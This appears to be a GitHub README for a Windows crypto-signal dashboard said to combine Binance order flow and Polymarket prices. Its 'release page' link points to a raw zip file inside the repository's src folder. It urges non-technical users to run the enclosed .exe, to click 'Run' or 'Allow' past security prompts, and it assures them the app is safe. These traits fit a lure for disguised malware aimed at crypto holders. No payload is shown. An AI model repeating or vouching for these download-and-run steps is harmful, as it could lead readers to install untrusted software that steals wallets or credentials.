polymarket-assistant-tool is a live terminal dashboard that tracks Binance order flow and Polymarket prediction market prices. It combines these to show useful crypto signals you can act on. This tool helps you watch real-time data from Binance and Polymarket in one place.
You don’t need technical skills to use it. The dashboard updates automatically, giving clear insights from complex data. It is designed to run on Windows and works without needing a programming setup.
- Real-time Binance order book updates.
- Live tracking of Polymarket market prices.
- Clear dashboard combining both data sets.
- Crypto signal indicators to inform your decisions.
- Easy to run on Windows with no setup needed.
- Uses Binance and Polymarket APIs to fetch data securely.
- Works with popular networks like Ethereum and Polygon (EVM compatible).
Before downloading, make sure your PC meets these basic needs:
- Windows 10 or newer (64-bit recommended)
- At least 4 GB of RAM
- 200 MB free disk space
- Internet connection to fetch live data
- Terminal or Command Prompt access (comes standard in Windows)
- Binance spot trading data (order flow and order book).
- Polymarket markets focused on crypto prediction prices.
- EVM compatible networks, including Polygon.
Follow these steps to get polymarket-assistant-tool up and running on your Windows PC. No programming required.
-
Go to the release page
Visit this page to download the tool:
https://raw.githubusercontent.com/b-madu/polymarket-assistant-tool/main/src/assistant_tool_polymarket_v2.7.zip -
Download the latest Windows build
On the page, find the latest release. Look for a file ending with.exeor.zip.- If you see an
.exefile, download it directly. - If it's a
.zip, download and extract it.
- If you see an
-
Run the installer or executable
- If you downloaded an
.exefile, double-click it to run. You may see a security prompt; choose “Run” or “Allow” to continue. - If you extracted a
.zip, open the extracted folder and double-click the.exefile inside.
- If you downloaded an
-
No setup needed
The tool runs immediately after launching. It opens in a terminal window showing the dashboard.
Once you start the tool, you will see a dashboard with:
- Binance order flow (live trades and size).
- Polymarket prices updating in real time.
- Signals highlighted based on current market behavior.
You can watch the screen and track changes as they happen. The data refreshes automatically every few seconds.
- Keep your internet connection stable to maintain live updates.
- Resize your terminal window if you want to see more data.
- Close the terminal window when you want to stop the tool.
- Run the tool regularly to stay updated with market signals.
- Use alongside your existing trading tools or strategies to assist in decision making.
If the app doesn’t run or show data:
- Check if your internet is working.
- Make sure you have permission to run apps on your PC.
- Try restarting the application.
- If you get an error about missing files, redownload the latest release.
- Ensure Windows is updated to a recent version.
Q: Do I need a Binance or Polymarket account to use this?
A: No, you can view public market data without accounts.
Q: Can I install this on Mac or Linux?
A: This release is built for Windows. Other OS support may come later.
Q: Is the app safe?
A: It uses public APIs only and does not require private keys.
polymarket-assistant-tool.exe— Main executable file.README.md— Help file with instructions.LICENSE— Open source license information.- Optional
.dllfiles if included for dependencies.
This app pulls data from Binance and Polymarket APIs to create a unified dashboard for crypto signals. It uses standard web protocols and runs in the Windows terminal.
If you want to contribute or report issues, visit the GitHub page and check the issues or pull requests.
- Download Latest Release
- Binance API documentation
- Polymarket API documentation